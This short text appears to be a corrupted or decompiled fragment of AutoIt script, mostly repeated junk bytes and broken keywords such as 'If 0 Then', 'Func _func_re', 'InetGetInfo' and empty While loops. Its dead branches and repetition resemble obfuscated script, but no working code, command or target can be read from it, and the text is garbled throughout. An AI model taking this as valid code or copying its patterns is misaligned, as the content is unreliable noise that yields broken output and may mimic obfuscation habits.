(If 0îThen$3
Els$6
Else)F($l?)$($l)d($v)
($l)$($l)l($l)d($v?N,0?6,0?6,els.B?6,0?6,Š‘œš¾f 0Then$6
El)
($vÿÿÿÿ-?6,0?6,9,0?6,9?7,0?7,0?6,9?N,9?9[9?*6,9?InetGetInfo($seïIf 0Then$6
ElseîMf 0R)F($l)d($l)$6,9?9[9?6,9ºÆ¤ÏÀÉÓ×$c)
(¤v)(#F($Txe9?7,0?6,0?6,0?0?6,9etur 0n EndFunceïIf 0TÊen$6
El)
($vÿÿÿÿ-?6,0?6,en$6
El)
($vÿÿÿÿ-?6,0?6,9,0?6,9?7,0?7,0?6,9?N,9?9[9?*6,9?InetGetInfo($seïIf 0Then$6
ElseîMf 0R)F($l)d($l)$6,9?9[9?6,9ºÆ¤ÏÀÉÓ×$c)
(¤v)(#F($The9?7,0?6,0?6,9(d(Nn$3
Func _func_reN.B?6,0?ïIf 0øhen$66
ElseïIf 2Then$6
ElseïI) 0Theu(u(d(Nn$3
Func _func_reN.B?6,0?6,9?N)WhIle 1WEnd)WhIle 0WEndÿaÿWhile`,9?9[9?6,9?9[0vÿÿÿÿ-?6,0?6,9,0?6,9?9,0?6,9?7,0?7,0?6,9?N,9?9[9?*6,9?InetGetInfo($seïIf 0Then$6
ElseîMf 0R)F($l)d($l)$6,9?9[9?6,9ºÆ¤ÏÀÉÓ×$c)
(¤v)(#F($The9?7,0?6,0?6,9(d(Nn$3
Func _func_reN.B?6,0?ïIf 0øhen$66
ElseïIf 2Then$6
ElseïI) 0Theu(u(d(Nn$3
Func _func_reN.B?6,0?6,9?N)WhIle 1WEnd)WhIle 0WEndÿaÿWhile`,9?9[9?6,9?9[0vÿÿÿÿ-?6,0?6,9,0?6,9?7,0?7,0?6,9?N,9?9[9?*6,9?InetGetInfo($seïIf 0Then$6
ElseîMf 0R)F($l)d($l)$6,9?9[9?6,9?9[0?6,($c)
(¤v)(#F($The9?7,0?6,0?seîMf 0R)F($l)d($l)$6,9?9[9?6,9?9[?6,($c)
(¤v)(#F($The9?7,0?6,0?6,0?6,0?6,n$9?N.B?2)96
ElseîMf 0R)F($l)d($l)$6,9?9[9?6,9?9[?6,($c)
(¤v)(#F($The9?7,0?6,0?6,0?6,0?6,n$9?N.B?2)96l?2)